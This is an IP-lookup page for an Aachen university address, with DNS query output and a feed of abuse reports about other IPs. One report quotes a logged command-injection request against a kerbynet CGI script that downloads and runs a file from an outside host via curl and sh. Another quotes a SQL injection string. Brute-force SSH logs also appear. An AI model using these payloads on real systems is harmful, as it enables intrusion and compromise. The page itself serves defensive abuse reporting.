137.226.202.104

基本信息:

城市(city): Aachen

省份(region): North Rhine-Westphalia

国家(country): Germany

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 137.226.202.104
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 58521
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;137.226.202.104.		IN	A

;; AUTHORITY SECTION:
.			372	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022070300 1800 900 604800 86400

;; Query time: 38 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Jul 03 15:45:10 CST 2022
;; MSG SIZE  rcvd: 108

HOST信息:

104.202.226.137.in-addr.arpa domain name pointer ip104.ithe.rwth-aachen.de.

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
104.202.226.137.in-addr.arpa	name = ip104.ithe.rwth-aachen.de.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
77.152.26.39	attack	2020-09-01T05:53:31+0200 Failed SSH Authentication/Brute Force Attack.(Server 2)	2020-09-01 14:43:37
23.98.152.191	attackbots	webserver:80 [01/Sep/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 0 webserver:80 [31/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 0 webserver:80 [31/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 0 webserver:80 [30/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 0	2020-09-01 14:37:07
51.91.76.3	attackspam	Sep 1 05:53:34 buvik sshd[4181]: Invalid user test from 51.91.76.3 Sep 1 05:53:34 buvik sshd[4181]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.91.76.3 Sep 1 05:53:36 buvik sshd[4181]: Failed password for invalid user test from 51.91.76.3 port 34054 ssh2 ...	2020-09-01 14:40:15
1.55.219.143	attackspam	Icarus honeypot on github	2020-09-01 14:44:07
193.228.91.11	attackbots	TCP (SYN) 193.228.91.11:49477 -> port 22, len 48	2020-09-01 14:46:20
185.213.155.169	attackbotsspam	Automatic report - Banned IP Access	2020-09-01 14:53:48
139.59.243.224	attackspambots	Sep 1 13:06:06 webhost01 sshd[3876]: Failed password for root from 139.59.243.224 port 54570 ssh2 ...	2020-09-01 14:30:23
101.78.149.142	attackbots	Sep 1 08:37:10 OPSO sshd\[677\]: Invalid user usuario from 101.78.149.142 port 40802 Sep 1 08:37:10 OPSO sshd\[677\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=101.78.149.142 Sep 1 08:37:12 OPSO sshd\[677\]: Failed password for invalid user usuario from 101.78.149.142 port 40802 ssh2 Sep 1 08:41:03 OPSO sshd\[1386\]: Invalid user user01 from 101.78.149.142 port 47216 Sep 1 08:41:03 OPSO sshd\[1386\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=101.78.149.142	2020-09-01 14:54:11
186.147.160.189	attack	Aug 31 18:53:00 web1 sshd\[23637\]: Invalid user lac from 186.147.160.189 Aug 31 18:53:00 web1 sshd\[23637\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=186.147.160.189 Aug 31 18:53:02 web1 sshd\[23637\]: Failed password for invalid user lac from 186.147.160.189 port 46810 ssh2 Aug 31 18:57:22 web1 sshd\[23951\]: Invalid user biz from 186.147.160.189 Aug 31 18:57:23 web1 sshd\[23951\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=186.147.160.189	2020-09-01 15:02:26
49.135.39.36	attackspambots	$f2bV_matches	2020-09-01 14:49:09
125.165.237.237	attackbotsspam	Automatic report - Port Scan Attack	2020-09-01 14:56:53
14.169.165.187	attackbots	14.169.165.187 - - \[01/Sep/2020:06:53:15 +0300\] "POST /xmlrpc.php HTTP/1.1" 200 428 "-" "Mozilla/5.0 $Windows NT 6.1\; Win64\; x64$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/59.0.3071.109 Safari/537.36" "-" 14.169.165.187 - - \[01/Sep/2020:06:53:18 +0300\] "POST /xmlrpc.php HTTP/1.1" 200 428 "-" "Mozilla/5.0 $Windows NT 6.1\; Win64\; x64$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/59.0.3071.109 Safari/537.36" "-" ...	2020-09-01 14:52:28
91.109.152.125	attackbots	srvr2: (mod_security) mod_security (id:920350) triggered by 91.109.152.125 (RU/-/ppp91-109-152-125.tis-dialog.ru): 1 in the last 600 secs; Ports: ; Direction: inout; Trigger: LF_MODSEC; Logs: 2020/09/01 05:53:30 [error] 479384#0: 406322 [client 91.109.152.125] ModSecurity: Access denied with code 406 (phase 2). Matched "Operator `Rx' with parameter `^[\d.:]+$' against variable `REQUEST_HEADERS:Host' [redacted] [file "/etc/modsecurity.d/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "718"] [id "920350"] [rev ""] [msg "Host header is a numeric IP address"] [redacted] [severity "4"] [ver "OWASP_CRS/3.3.0"] [maturity "0"] [accuracy "0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/6.5.10"] [redacted] [uri "/"] [unique_id "159893241042.968422"] [ref "o0,14v21,14"], client: 91.109.152.125, [redacted] request: "GET / HTTP/1.1" [redacted]	2020-09-01 14:43:02
49.51.40.123	attack	SQL Injection in QueryString parameter: 299999" union select unhex(hex(version())) -- "x"="x	2020-09-01 14:25:56
49.88.112.60	attack	Logfile match	2020-09-01 14:36:17

最近上报的IP列表

137.226.202.247	137.226.203.155	80.82.66.10	180.76.161.32
77.51.179.130	45.93.16.42	14.47.142.38	189.15.25.176
178.22.41.112	41.218.78.238	71.8.105.149	160.238.170.35
14.37.150.250	201.150.36.186	43.128.9.166	14.6.226.231
116.73.28.67	222.141.143.59	174.138.30.115	183.177.98.155